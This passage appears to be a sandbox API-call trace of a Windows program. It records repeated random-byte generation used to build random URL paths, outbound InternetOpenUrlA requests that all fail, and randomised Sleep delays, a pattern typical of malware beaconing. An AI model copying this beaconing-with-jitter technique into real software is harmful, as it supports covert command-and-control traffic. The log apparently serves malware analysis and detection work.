pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.771] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0212.771] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.772] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.772] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0212.772] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.772] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.772] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0212.773] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0212.773] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.773] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.773] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.774] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0212.774] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.774] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.774] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.774] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.775] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.775] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.775] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.775] GetProcessHeap () returned 0x440000 [0212.775] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473770 [0212.775] lstrcpyA (in: lpString1=0x473770, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0212.775] lstrcatA (in: lpString1="\x81\x03", lpString2="/wzleMELve8t39pkz25t9adngejNoznkjqg8/zgbNBug6gnhk5upy1W4b/pjCBtxud5vOsmbb3ivey946Lqvqvdk9Oanglag7zzplfy/NLovNl9bxq9at88aze4udhhbxu/" | out: lpString1="\x81\x03/wzleMELve8t39pkz25t9adngejNoznkjqg8/zgbNBug6gnhk5upy1W4b/pjCBtxud5vOsmbb3ivey946Lqvqvdk9Oanglag7zzplfy/NLovNl9bxq9at88aze4udhhbxu/") returned="\x81\x03/wzleMELve8t39pkz25t9adngejNoznkjqg8/zgbNBug6gnhk5upy1W4b/pjCBtxud5vOsmbb3ivey946Lqvqvdk9Oanglag7zzplfy/NLovNl9bxq9at88aze4udhhbxu/" [0212.775] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0212.776] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/wzleMELve8t39pkz25t9adngejNoznkjqg8/zgbNBug6gnhk5upy1W4b/pjCBtxud5vOsmbb3ivey946Lqvqvdk9Oanglag7zzplfy/NLovNl9bxq9at88aze4udhhbxu/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0212.776] GetProcessHeap () returned 0x440000 [0212.776] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473770 | out: hHeap=0x440000) returned 1 [0212.776] GetProcessHeap () returned 0x440000 [0212.776] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d6570 | out: hHeap=0x440000) returned 1 [0212.776] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0212.777] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0212.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0212.777] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0212.777] Sleep (dwMilliseconds=0x18c8b) [0213.102] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0213.102] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0213.102] GetProcessHeap () returned 0x440000 [0213.102] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0213.103] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0213.104] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x21, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0213.104] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0213.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.108] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.108] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.108] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.108] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0213.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0213.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b272, cbBuffer=0x12, dwFlags=0x2 | out: pbBuffer=0x3a1b272) returned 0x0 [0213.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.114] GetProcessHeap () returned 0x440000 [0213.115] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472b10 [0213.115] lstrcpyA (in: lpString1=0x472b10, lpString2="P²¡\x03" | out: lpString1="P²¡\x03") returned="P²¡\x03" [0213.115] lstrcatA (in: lpString1="P²¡\x03", lpString2="/qn6u3a2xq2yDbfh5s4Uqij3McUdc8VlH/ti9gdkwuqfwip857s/" | out: lpString1="P²¡\x03/qn6u3a2xq2yDbfh5s4Uqij3McUdc8VlH/ti9gdkwuqfwip857s/") returned="P²¡\x03/qn6u3a2xq2yDbfh5s4Uqij3McUdc8VlH/ti9gdkwuqfwip857s/" [0213.115] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0213.115] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P²¡\x03/qn6u3a2xq2yDbfh5s4Uqij3McUdc8VlH/ti9gdkwuqfwip857s/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0213.115] GetProcessHeap () returned 0x440000 [0213.115] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472b10 | out: hHeap=0x440000) returned 1 [0213.115] GetProcessHeap () returned 0x440000 [0213.115] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0213.115] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0213.116] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0213.116] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0213.116] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0213.453] Sleep (dwMilliseconds=0x188ff) [0213.758] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.758] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0213.758] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.758] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0213.758] GetProcessHeap () returned 0x440000 [0213.758] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02250 [0213.759] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.759] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0213.759] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.759] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02251, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x3a02251) returned 0x0 [0213.760] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.760] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.760] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.760] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.761] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.761] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.761] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.761] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.761] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.761] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.761] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.762] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.762] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.762] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.762] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.762] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.762] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.763] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.763] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, 